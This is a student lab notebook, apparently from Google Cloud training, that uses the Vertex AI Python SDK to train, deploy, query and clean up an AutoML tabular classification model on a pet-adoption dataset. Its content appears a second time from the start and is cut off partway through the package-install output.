Vertex AI Model Builder SDK: AutoML Tabular Training and Prediction OverviewIn this notebook, you learn how to use the Vertex AI Python client library to train and deploy a tabular classification model for online prediction. Learning ObjectiveIn this notebook, you learn how to:* Create a Vertex AI model training job.* Train an AutoML tabular model.* Deploy the `model` resource to a serving `endpoint` resource.* Make a prediction by sending data.* Undeploy the `model` resource. IntroductionIn this notebook, you will use Vertex AI Python client library to train and make predictions on an AutoML model based on a tabular dataset. Alternatively, you can train and make predictions on models by using the gcloud command-line tool or by using the online Cloud Console.Each learning objective will correspond to a __TODO__ in this student lab notebook -- try to complete this notebook first and then review the [solution notebook](../solutions/automl-tabular-classification.ipynb). **Make sure to enable the Vertex AI API and Compute Engine API.** Installation
###Code
# Setup your dependencies
import os
# The Google Cloud Notebook product has specific requirements
IS_GOOGLE_CLOUD_NOTEBOOK = os.path.exists("/opt/deeplearning/metadata/env_version")
USER_FLAG = ""
# Google Cloud Notebook requires dependencies to be installed with '--user'
if IS_GOOGLE_CLOUD_NOTEBOOK:
USER_FLAG = "--user"
###Output
_____no_output_____
###Markdown
Install the latest version of the Vertex AI client library.Run the following command in your virtual environment to install the Vertex SDK for Python:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-aiplatform
###Output
Requirement already satisfied: google-cloud-aiplatform in /opt/conda/lib/python3.7/site-packages (1.1.1)
Collecting google-cloud-aiplatform
Downloading google_cloud_aiplatform-1.3.0-py2.py3-none-any.whl (1.3 MB)
[K |████████████████████████████████| 1.3 MB 7.6 MB/s eta 0:00:01
[?25hRequirement already satisfied: proto-plus>=1.10.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.19.0)
Requirement already satisfied: google-cloud-bigquery<3.0.0dev,>=1.15.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (2.23.2)
Requirement already satisfied: google-api-core[grpc]<3.0.0dev,>=1.26.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.31.1)
Requirement already satisfied: google-cloud-storage<2.0.0dev,>=1.32.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.41.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (21.0)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.53.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.1)
Requirement already satisfied: google-auth<2.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.34.0)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.25.1)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (49.6.0.post20210108)
Requirement already satisfied: grpcio<2.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.38.1)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.7.2)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.2.7)
Requirement already satisfied: google-resumable-media<3.0dev,>=0.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.3.2)
Requirement already satisfied: google-cloud-core<3.0.0dev,>=1.4.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-cloud-aiplatform) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.4.8)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.5.30)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.26.6)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.0.0)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.10)
Installing collected packages: google-cloud-aiplatform
[33m WARNING: The script tb-gcp-uploader is installed in '/home/jupyter/.local/bin' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.[0m
Successfully installed google-cloud-aiplatform-1.3.0
###Markdown
Install the Cloud Storage library:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-storage
###Output
Requirement already satisfied: google-cloud-storage in /opt/conda/lib/python3.7/site-packages (1.41.1)
Collecting google-cloud-storage
Downloading google_cloud_storage-1.42.0-py2.py3-none-any.whl (105 kB)
[K |████████████████████████████████| 105 kB 8.1 MB/s eta 0:00:01
[?25hRequirement already satisfied: google-resumable-media<3.0dev,>=1.3.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.3.2)
Requirement already satisfied: google-auth<3.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.34.0)
Requirement already satisfied: google-cloud-core<3.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.7.2)
Requirement already satisfied: google-api-core<3.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.31.1)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (2.25.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (21.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2021.1)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.53.0)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (49.6.0.post20210108)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.2.7)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.4.8)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (1.26.6)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2.10)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2021.5.30)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (4.0.0)
Installing collected packages: google-cloud-storage
Successfully installed google-cloud-storage-1.42.0
###Markdown
Restart the kernelAfter you install the additional packages, you need to restart the notebook kernel so it can find the packages.
###Code
# Automatically restart kernel after installs
import os
if not os.getenv("IS_TESTING"):
# Automatically restart kernel after installs
import IPython
app = IPython.Application.instance()
app.kernel.do_shutdown(True)
###Output
_____no_output_____
###Markdown
Set your project ID**If you don't know your project ID**, you may be able to get your project ID using `gcloud`.
###Code
import os
PROJECT_ID = ""
# Get your Google Cloud project ID from gcloud
if not os.getenv("IS_TESTING"):
shell_output=!gcloud config list --format 'value(core.project)' 2>/dev/null
PROJECT_ID = shell_output[0]
print("Project ID: ", PROJECT_ID)
###Output
Project ID: qwiklabs-gcp-04-c846b6079446
###Markdown
Otherwise, set your project ID here.
###Code
if PROJECT_ID == "" or PROJECT_ID is None:
PROJECT_ID = "qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
###Output
_____no_output_____
###Markdown
TimestampIf you are in a live tutorial session, you might be using a shared test account or project. To avoid name collisions between users on resources created, you create a timestamp for each instance session, and append it onto the name of resources you create in this tutorial.
###Code
# Import necessary libraries
from datetime import datetime
# Use a timestamp to ensure unique resources
TIMESTAMP = datetime.now().strftime("%Y%m%d%H%M%S")
###Output
_____no_output_____
###Markdown
Create a Cloud Storage bucket**The following steps are required, regardless of your notebook environment.**This notebook demonstrates how to use Model Builder SDK to create an AutoML model based on a tabular dataset. You will need to provide a Cloud Storage bucket where the dataset will be stored.Set the name of your Cloud Storage bucket below. It must be unique across all of your Cloud Storage buckets.You may also change the `REGION` variable, which is used for operationsthroughout the rest of this notebook. Make sure to [choose a region where Vertex AI services areavailable](https://cloud.google.com/vertex-ai/docs/general/locations). You maynot use a Multi-Regional Storage bucket for training with Vertex AI.
###Code
BUCKET_NAME = "gs://qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
REGION = "us-central1" # @param {type:"string"}
if BUCKET_NAME == "" or BUCKET_NAME is None or BUCKET_NAME == "gs://qwiklabs-gcp-04-c846b6079446":
BUCKET_NAME = "gs://" + PROJECT_ID + "aip-" + TIMESTAMP
###Output
_____no_output_____
###Markdown
**Only if your bucket doesn't already exist**: Run the following cell to create your Cloud Storage bucket.
###Code
! gsutil mb -l $REGION $BUCKET_NAME
###Output
Creating gs://qwiklabs-gcp-04-c846b6079446aip-20210826051658/...
###Markdown
Finally, validate access to your Cloud Storage bucket by examining its contents:
###Code
! gsutil ls -al $BUCKET_NAME
###Output
_____no_output_____
###Markdown
Copy dataset into your Cloud Storage bucket
###Code
IMPORT_FILE = "petfinder-tabular-classification.csv"
! gsutil cp gs://cloud-samples-data/ai-platform-unified/datasets/tabular/{IMPORT_FILE} {BUCKET_NAME}/data/
gcs_source = f"{BUCKET_NAME}/data/{IMPORT_FILE}"
###Output
Copying gs://cloud-samples-data/ai-platform-unified/datasets/tabular/petfinder-tabular-classification.csv [Content-Type=text/csv]...
/ [1 files][872.8 KiB/872.8 KiB]
Operation completed over 1 objects/872.8 KiB.
###Markdown
Import Vertex SDK for PythonImport the Vertex SDK into your Python environment and initialize it.
###Code
# Import necessary libraries
import os
from google.cloud import aiplatform
aiplatform.init(project=PROJECT_ID, location=REGION)
###Output
_____no_output_____
###Markdown
TutorialNow you are ready to create your AutoML Tabular model. Create a Managed Tabular Dataset from a CSVThis section will create a dataset from a CSV file stored on your GCS bucket.
###Code
ds = dataset = aiplatform.TabularDataset.create(
display_name="petfinder-tabular-dataset",
gcs_source=gcs_source,
)
ds.resource_name
###Output
INFO:google.cloud.aiplatform.datasets.dataset:Creating TabularDataset
INFO:google.cloud.aiplatform.datasets.dataset:Create TabularDataset backing LRO: projects/1075205415941/locations/us-central1/datasets/1945247175768276992/operations/1110822578768838656
INFO:google.cloud.aiplatform.datasets.dataset:TabularDataset created. Resource name: projects/1075205415941/locations/us-central1/datasets/1945247175768276992
INFO:google.cloud.aiplatform.datasets.dataset:To use this TabularDataset in another session:
INFO:google.cloud.aiplatform.datasets.dataset:ds = aiplatform.TabularDataset('projects/1075205415941/locations/us-central1/datasets/1945247175768276992')
###Markdown
Launch a Training Job to Create a ModelOnce we have defined your training script, we will create a model. The `run` function creates a training pipeline that trains and creates a `Model` object. After the training pipeline completes, the `run` function returns the `Model` object.
###Code
# TODO 1
# Constructs a AutoML Tabular Training Job
job = aiplatform.AutoMLTabularTrainingJob(
display_name="train-petfinder-automl-1",
optimization_prediction_type="classification",
column_transformations=[
{"categorical": {"column_name": "Type"}},
{"numeric": {"column_name": "Age"}},
{"categorical": {"column_name": "Breed1"}},
{"categorical": {"column_name": "Color1"}},
{"categorical": {"column_name": "Color2"}},
{"categorical": {"column_name": "MaturitySize"}},
{"categorical": {"column_name": "FurLength"}},
{"categorical": {"column_name": "Vaccinated"}},
{"categorical": {"column_name": "Sterilized"}},
{"categorical": {"column_name": "Health"}},
{"numeric": {"column_name": "Fee"}},
{"numeric": {"column_name": "PhotoAmt"}},
],
)
# TODO 2a
# Create and train the model object
# This will take around an hour to run
model = job.run(
dataset=ds,
target_column="Adopted",
# TODO 2b
# Define training, validation and test fraction for training
training_fraction_split=0.8,
validation_fraction_split=0.1,
test_fraction_split=0.1,
model_display_name="adopted-prediction-model",
disable_early_stopping=False,
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
/opt/conda/lib/python3.7/site-packages/ipykernel_launcher.py:16: DeprecationWarning: consider using column_specs instead. column_transformations will be deprecated in the future.
app.launch_new_instance()
###Markdown
Deploy your modelBefore you use your model to make predictions, you need to deploy it to an `Endpoint`. You can do this by calling the `deploy` function on the `Model` resource. This function does two things:1. Creates an `Endpoint` resource to which the `Model` resource will be deployed.2. Deploys the `Model` resource to the `Endpoint` resource.Deploy your model. NOTE: Wait until the model **FINISHES** deployment before proceeding to prediction.
###Code
# TODO 3
# Deploy the model resource to the serving endpoint resource
endpoint = model.deploy(
machine_type="n1-standard-4",
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Predict on the endpoint * This sample instance is taken from an observation in which `Adopted` = **Yes*** Note that the values are all strings. Since the original data was in CSV format, everything is treated as a string. The transformations you defined when creating your `AutoMLTabularTrainingJob` inform Vertex AI to transform the inputs to their defined types.
###Code
# TODO 4
# Make a prediction using the sample values
prediction = endpoint.predict(
[
{
"Type": "Cat",
"Age": "3",
"Breed1": "Tabby",
"Gender": "Male",
"Color1": "Black",
"Color2": "White",
"MaturitySize": "Small",
"FurLength": "Short",
"Vaccinated": "No",
"Sterilized": "No",
"Health": "Healthy",
"Fee": "100",
"PhotoAmt": "2",
}
]
)
print(prediction)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Undeploy the modelTo undeploy your `Model` resource from the serving `Endpoint` resource, use the endpoint's `undeploy` method with the following parameter:- `deployed_model_id`: The model deployment identifier returned by the prediction service when the `Model` resource is deployed. You can retrieve the `deployed_model_id` using the prediction object's `deployed_model_id` property.
###Code
# TODO 5
# Undeploy the model resource
endpoint.undeploy(deployed_model_id=prediction.deployed_model_id)
###Output
INFO:google.cloud.aiplatform.models:Undeploying Endpoint model: projects/1075205415941/locations/us-central1/endpoints/7467372802459303936
###Markdown
Cleaning upTo clean up all Google Cloud resources used in this project, you can [delete the Google Cloud project](https://cloud.google.com/resource-manager/docs/creating-managing-projectsshutting_down_projects) you used for the tutorial.Otherwise, you can delete the individual resources you created in this tutorial:- Training Job- Model- Endpoint- Cloud Storage Bucket**Note**: You must delete any `Model` resources deployed to the `Endpoint` resource before deleting the `Endpoint` resource.
###Code
delete_training_job = True
delete_model = True
delete_endpoint = True
# Warning: Setting this to true will delete everything in your bucket
delete_bucket = False
# Delete the training job
job.delete()
# Delete the model
model.delete()
# Delete the endpoint
endpoint.delete()
if delete_bucket and "BUCKET_NAME" in globals():
! gsutil -m rm -r $BUCKET_NAME
###Output
INFO:google.cloud.aiplatform.base:Deleting AutoMLTabularTrainingJob : projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Delete AutoMLTabularTrainingJob backing LRO: projects/1075205415941/locations/us-central1/operations/5317466105709592576
INFO:google.cloud.aiplatform.base:AutoMLTabularTrainingJob deleted. . Resource name: projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Deleting Model : projects/1075205415941/locations/us-central1/models/3676687718445744128
###Markdown
Vertex AI Model Builder SDK: AutoML Tabular Training and Prediction OverviewIn this notebook, you learn how to use the Vertex AI Python client library to train and deploy a tabular classification model for online prediction. Learning ObjectiveIn this notebook, you learn how to:* Create a Vertex AI model training job.* Train an AutoML tabular model.* Deploy the `model` resource to a serving `endpoint` resource.* Make a prediction by sending data.* Undeploy the `model` resource. IntroductionIn this notebook, you will use Vertex AI Python client library to train and make predictions on an AutoML model based on a tabular dataset. Alternatively, you can train and make predictions on models by using the gcloud command-line tool or by using the online Cloud Console.Each learning objective will correspond to a __TODO__ in this student lab notebook -- try to complete this notebook first and then review the [solution notebook](../solutions/automl-tabular-classification.ipynb). **Make sure to enable the Vertex AI API and Compute Engine API.** Installation
###Code
# Setup your dependencies
import os
# The Google Cloud Notebook product has specific requirements
IS_GOOGLE_CLOUD_NOTEBOOK = os.path.exists("/opt/deeplearning/metadata/env_version")
USER_FLAG = ""
# Google Cloud Notebook requires dependencies to be installed with '--user'
if IS_GOOGLE_CLOUD_NOTEBOOK:
USER_FLAG = "--user"
###Output
_____no_output_____
###Markdown
Install the latest version of the Vertex AI client library.Run the following command in your virtual environment to install the Vertex SDK for Python:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-aiplatform
###Output
Requirement already satisfied: google-cloud-aiplatform in /opt/conda/lib/python3.7/site-packages (1.1.1)
Collecting google-cloud-aiplatform
Downloading google_cloud_aiplatform-1.3.0-py2.py3-none-any.whl (1.3 MB)
[K |████████████████████████████████| 1.3 MB 7.6 MB/s eta 0:00:01
[?25hRequirement already satisfied: proto-plus>=1.10.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.19.0)
Requirement already satisfied: google-cloud-bigquery<3.0.0dev,>=1.15.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (2.23.2)
Requirement already satisfied: google-api-core[grpc]<3.0.0dev,>=1.26.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.31.1)
Requirement already satisfied: google-cloud-storage<2.0.0dev,>=1.32.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.41.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (21.0)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.53.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.1)
Requirement already satisfied: google-auth<2.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.34.0)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.25.1)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (49.6.0.post20210108)
Requirement already satisfied: grpcio<2.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.38.1)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.7.2)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.2.7)
Requirement already satisfied: google-resumable-media<3.0dev,>=0.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.3.2)
Requirement already satisfied: google-cloud-core<3.0.0dev,>=1.4.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-cloud-aiplatform) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.4.8)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.5.30)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.26.6)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.0.0)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.10)
Installing collected packages: google-cloud-aiplatform
[33m WARNING: The script tb-gcp-uploader is installed in '/home/jupyter/.local/bin' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.[0m
Successfully installed google-cloud-aiplatform-1.3.0
###Markdown
Install the Cloud Storage library:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-storage
###Output
Requirement already satisfied: google-cloud-storage in /opt/conda/lib/python3.7/site-packages (1.41.1)
Collecting google-cloud-storage
Downloading google_cloud_storage-1.42.0-py2.py3-none-any.whl (105 kB)
[K |████████████████████████████████| 105 kB 8.1 MB/s eta 0:00:01
[?25hRequirement already satisfied: google-resumable-media<3.0dev,>=1.3.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.3.2)
Requirement already satisfied: google-auth<3.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.34.0)
Requirement already satisfied: google-cloud-core<3.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.7.2)
Requirement already satisfied: google-api-core<3.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.31.1)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (2.25.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (21.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2021.1)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.53.0)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (49.6.0.post20210108)
